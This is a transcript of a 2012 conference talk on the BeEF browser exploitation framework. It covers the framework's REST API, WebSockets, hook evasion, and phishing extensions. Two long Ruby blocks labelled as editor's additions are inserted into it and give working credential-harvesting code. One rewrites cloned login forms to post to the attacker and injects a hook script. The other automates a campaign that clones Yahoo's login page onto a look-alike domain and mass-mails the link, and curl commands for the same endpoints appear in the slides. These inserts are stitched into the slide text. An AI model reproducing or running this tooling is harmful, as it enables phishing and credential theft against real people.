

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    BeEF_EUSecWest-2012_Michele-Orru - Presentation Transcript

    • BeEF, the Browser Exploitation Framework: What’s new from 2011
      EUSecWest - 19 Sept 2012
      Michele “antisnatchor” Orru
    • Who am I
      • Lead core developer of BeEF
      • Application Security Researcher
      • OpenBSD, Ruby and JavaScript addicted
      • Senior Security Consultant @ Trustwave SpiderLabs
    • Outline
      • Brief intro to BeEF
      • New core features: RESTful API, WebSockets, HTTPS
      • New extensions: Evasion, Social Engineering
    • Meet BeEF
      • Browser Exploitation Framework
      • Pioneered by Wade Alcorn in 2005
      • Powerful platform for client-side pwnage, XSS post-exploitation and, generally, abuse of the victim browser’s security context
      • The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context
    • RESTful API
      • The truth is:
        • I hate SOAP
        • I hate XML-RPC
        • I love to use protocol (HTTP) features without reinventing the wheel
    • RESTful API
      • Ruby + Sinatra + JSON:
          get '/to/a/pub' do
            "BeER please"
          end
    • RESTful API
      • Facts:
        • programmatically control BeEF with whatever eats HTTP and JSON
        • integration is much easier
        • adding your custom logic is much easier
    • RESTful API demo: Java mass-pwner
      • Fingerprint hooked browsers
      • Achieve different forms of persistence
      • Inject an (unsigned) applet to determine the exact JVM version/architecture/platform
      • Inject a second applet to launch a targeted attack with a malicious payload
    • WebSockets
      • The HTML5 specification introduces new features, including WebWorkers and WebSockets
      • WebSockets enable (almost) real-time communication between your webapp users and the backend
      • Streaming protocol, up to 2MB/message in the latest browsers
    • WebSockets (diagram: XHR-polling vs. WebSocket)
    • WebSockets
      • Server-side: event-based server
      • Client-side: WebSocket (or MozWebSocket, damn prefixes #$%) objects exposed via JavaScript
      • If the victim browser supports the technology, protocols are switched
      • Not (yet) enabled by default in BeEF: we’re still testing it
    • WebSockets
      • WebSockets open new horizons:
        • faster Tunneling Proxy (10x faster)
        • real-time VNC-like hooked browser control
        • generally faster communication
    • WebSockets demo
      • BeEF Tunneling Proxy with and without WebSockets
      • exploiting a SQLi with sqlmap through the tunneling proxy with WebSockets
    • HTTPS/WSS
      • BeEF supports HTTPS and WebSocket Secure (WSS); you just need to specify your certificate
      • Motivation:
        • STS support implemented in the latest browsers (see Mixed Scripting)
        • prevent filtering if an SSL proxy is not used
    • HTTPS/WSS
      • About STS: Strict Transport Security, meaning that:
        • see http://blog.chromium.org/2012/08/ending-mixed-scripting-vulnerabilities.html
        • hooked domain https://linkedin.com, BeEF at http://beef.com: the browser will deny loading a script from a non-HTTPS resource
        • hooked domain https://linkedin.com, BeEF at https://beef.com: this will work!
      • (Strictly, the block in the first case is the browser’s mixed-scripting protection, which applies to any HTTPS page; STS additionally pins the hooked domain itself to HTTPS. Either way, the hook has to be served over HTTPS.)
    • Evasion Extension
      • Motivation: decrease the likelihood that the BeEF hook injection and communication will be detected
        • by machines (network filters)
        • by humans
    • Evasion Extension
      • define your own techniques, specifying whether they need a bootstrapper
      • define the technique chain
    • Social Eng. extension
      • The idea was to have some BeEF functionality that can be called via the RESTful API, in order to automate:
        • sending phishing emails using templates
        • cloning webpages, harvesting credentials
        • client-side pwnage
    • AND... WE DID IT!
    • Social Eng. extension
    • Social Eng. extension: web_cloner
      • Clone a webpage and serve it on BeEF, then automatically:
        • modify the page to intercept POST requests
        • add the BeEF hook to it
        • if the page can be framed, after POST interception load the original page in an overlay iFrame, otherwise redirect to the original page
    • Social Eng. extension: web_cloner
      • curl -H "Content-Type: application/json; charset=UTF-8" \
            -d '{"url":"https://login.yahoo.com/config/login_verify2","mount":"/"}' \
            -X POST "http://<BeEF>/api/seng/clone_page?token=53921d2736116dbd86f8f7f7f10e46f1"
      • If you register loginyahoo.com, you can specify a mount point of /config/login_verify2, so the phishing URL will be (almost) the same
    • Social Eng. extension: web_cloner • Demo
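    The three rewrites the web_cloner slide lists, shown as an added Ruby example (editor's illustration, not BeEF's own web_cloner code). It assumes the hook is served at <BeEF>/hook.js, BeEF's default hook path, and takes "can the original be framed" as a parameter, since that is decided by the target's X-Frame-Options / CSP frame-ancestors headers rather than by the clone; the sample login page is constructed for the example.

```ruby
# Added example (editor's code, not BeEF's web_cloner): the three page
# rewrites the slide lists, applied to a fetched HTML string.
# Assumptions: hook served at <BeEF>/hook.js (BeEF's default path); whether
# the original can be framed is passed in (X-Frame-Options / CSP decide it).
require 'cgi'
require 'json'

# 1. Intercept POSTs: point every form at the clone's mount point on BeEF and
#    keep the original action so the server can replay or redirect later.
def intercept_posts(html, mount)
  html.gsub(/<form\b([^>]*)>/i) do
    attrs = Regexp.last_match(1)
    original = attrs[/\baction\s*=\s*["']([^"']*)["']/i, 1] || ''
    rest = attrs.sub(/\baction\s*=\s*["'][^"']*["']/i, '').rstrip
    %(<form#{rest} action="#{mount}" data-original-action="#{CGI.escapeHTML(original)}">)
  end
end

# 2. Add the BeEF hook just before </body> (append it if the page has no body end tag).
def add_hook(html, beef_url)
  tag = %(<script src="#{beef_url}/hook.js"></script>)
  html =~ %r{</body>}i ? html.sub(%r{</body>}i, "#{tag}</body>") : html + tag
end

# 3. After the POST is captured: overlay the original page in a full-screen
#    iframe when it can be framed, otherwise redirect the victim to it.
def after_capture_js(original_url, framable)
  if framable
    "var f=document.createElement('iframe');f.src=#{original_url.to_json};" \
    "f.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;border:0;z-index:2147483647';" \
    "document.body.appendChild(f);"
  else
    "window.location=#{original_url.to_json};"
  end
end

# Full clone transform: rewrite forms, then inject the hook.
def clone_page(html, beef_url:, mount:)
  add_hook(intercept_posts(html, mount), beef_url)
end

# Constructed sample login page (not any real site's markup).
SAMPLE_PAGE = <<~HTML
  <html><body>
  <form method="post" action="https://login.example.com/verify">
    <input name="user"><input name="pass" type="password"><input type="submit">
  </form>
  </body></html>
HTML

if __FILE__ == $PROGRAM_NAME
  puts clone_page(SAMPLE_PAGE, beef_url: 'http://beef.example:3000', mount: '/config/login_verify2')
  puts after_capture_js('https://login.example.com/verify', false)
end
```

    The original action is kept in a data attribute so the server side that receives the intercepted POST knows where to forward or redirect; the regex approach is fine for a demo but a real cloner should walk the DOM, since forms with JavaScript-set actions or actions split across attributes will slip past it.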
    • Social Eng. extension: mass_mailer
      • Do your phishing email campaigns:
        • get a sample email from your target (with company footer...)
        • copy the HTML content into a new BeEF email template
        • download images so they will be added inline!
        • add your malicious links/attachments
        • send the mail to X targets and have fun
    • Social Eng. extension: mass_mailer
      • email templates structure
    • Social Eng. extension: mass_mailer
      • ‘default’ template HTML mail
    • Social Eng. extension: mass_mailer
      • how the ‘default’ template email will look
    • Social Eng. extension: mass_mailer
      • curl -H "Content-Type: application/json; charset=UTF-8" \
            -d '{ "template": "default", "subject": "Hi from BeEF", "fromname": "BeEF",
                  "link": "http://www.microsoft.com/", "linktext": "http://beefproject.com",
                  "recipients": [{ "user1@gmail.com": "Michele", "user2@antisnatchor.com": "Antisnatchor" }] }' \
            -X POST "http://<BeEF>/api/seng/send_mails?token=0fda00ea62a1102f"
    • Social Eng. extension: mass_mailer • Demo
    • Social Eng. extension: combine everything FTW
      • Register your phishing domain
      • Point the A/MX records to a VPS where you have an SMTP server and BeEF
      • Create a BeEF RESTful API script that:
        • clones a webpage with web_cloner
        • sends X emails containing the link with mass_mailer
        • scripts intelligent attacks thanks to BeEF browser detection
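    The third step of that procedure, the API script, as an added Ruby example (editor's code, not part of BeEF) built around the two curl calls from the web_cloner and mass_mailer slides. It assumes BeEF listens at the given base URL, that the API token was already obtained (BeEF hands it out on login, which is not shown here), and that both endpoints answer with JSON; the recording transport and its success reply are constructed so the script runs offline as a dry run.

```ruby
# Added example (editor's code, not part of BeEF): a small client for the
# Social Engineering endpoints shown on the slides, driving the whole
# "combine everything" flow: clone the target page, then mail the link.
# Assumptions: BeEF listens at BASE, the API token was obtained beforehand,
# and both endpoints answer JSON.
require 'json'
require 'net/http'
require 'uri'

class BeefSeng
  # transport: callable (Net::HTTP::Post, URI) -> response body String.
  # The default sends the request; dry runs and tests inject a recorder.
  def initialize(base, token, transport: nil)
    @base = URI(base)
    @token = token
    @transport = transport || method(:live_post)
  end

  # POST /api/seng/clone_page?token=...  body: {"url": ..., "mount": ...}
  def clone_page(url, mount: '/')
    post('/api/seng/clone_page', 'url' => url, 'mount' => mount)
  end

  # POST /api/seng/send_mails?token=...  body as on the mass_mailer slide;
  # recipients is one Hash of address => display name, wrapped in an array.
  def send_mails(template:, subject:, fromname:, link:, linktext:, recipients:)
    post('/api/seng/send_mails',
         'template' => template, 'subject' => subject, 'fromname' => fromname,
         'link' => link, 'linktext' => linktext, 'recipients' => [recipients])
  end

  # Same headers and token placement as the curl examples.
  def build_request(path, body)
    uri = @base.dup
    uri.path = path
    uri.query = URI.encode_www_form(token: @token)
    req = Net::HTTP::Post.new(uri)
    req['Content-Type'] = 'application/json; charset=UTF-8'
    req.body = JSON.generate(body)
    [req, uri]
  end

  private

  def post(path, body)
    req, uri = build_request(path, body)
    JSON.parse(@transport.call(req, uri))
  end

  def live_post(req, uri)
    Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') do |http|
      http.request(req).body
    end
  end
end

# Dry-run transport: records what would be sent and fakes a success reply
# (constructed for the example; the real reply format is BeEF's).
class RecordingTransport
  attr_reader :sent
  def initialize; @sent = []; end
  def call(req, uri)
    @sent << { url: uri.to_s, body: JSON.parse(req.body) }
    '{"success":true}'
  end
end

# The script from the slide: clone with web_cloner, then send with mass_mailer.
# Mounting the clone under the target's own path keeps the phishing URL
# almost identical once the look-alike domain points at the BeEF host.
def run_campaign(client, phish_host:, target_url:, mount:, recipients:)
  clone = client.clone_page(target_url, mount: mount)
  link = "http://#{phish_host}#{mount}"
  mail = client.send_mails(template: 'default', subject: 'Please verify your account',
                           fromname: 'IT Support', link: link, linktext: target_url,
                           recipients: recipients)
  { clone: clone, mail: mail, link: link }
end

if __FILE__ == $PROGRAM_NAME
  # Offline dry run with constructed values; pass transport: nil to talk to a real BeEF.
  rec = RecordingTransport.new
  client = BeefSeng.new('http://127.0.0.1:3000', 'REPLACE_WITH_API_TOKEN', transport: rec)
  run_campaign(client, phish_host: 'loginyahoo.com',
               target_url: 'https://login.yahoo.com/config/login_verify2',
               mount: '/config/login_verify2',
               recipients: { 'user1@example.com' => 'Michele' })
  rec.sent.each { |r| puts "#{r[:url]}\n  #{JSON.generate(r[:body])}" }
end
```

    Keeping the HTTP transport injectable is what makes the campaign logic testable without a running BeEF; the same class talks to a live instance when no transport is passed, and the third bullet (reacting to BeEF's browser detection) would hang off the clone response in the same way.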
    • Unfortunately...
      • There were so many changes from 2011 that we can’t cover them all in a one-hour talk
      • Other interesting extensions: QRcode, CustomHook, Notification
      • Other interesting core features: web imitation, cleaner/better code :D
      • Tens of new modules: we now have 125 modules (and counting :-)
    • Thanks
      • Wade, for always being awesome
      • The other BeEF guys: Brendan, Christian, Ben, Saafan, Ryan, Heather
      • A few new project joiners: Bart Leppens, gallypette, Quentin Swain
      • Tom Neaves for the captain hook images :D
    • Questions?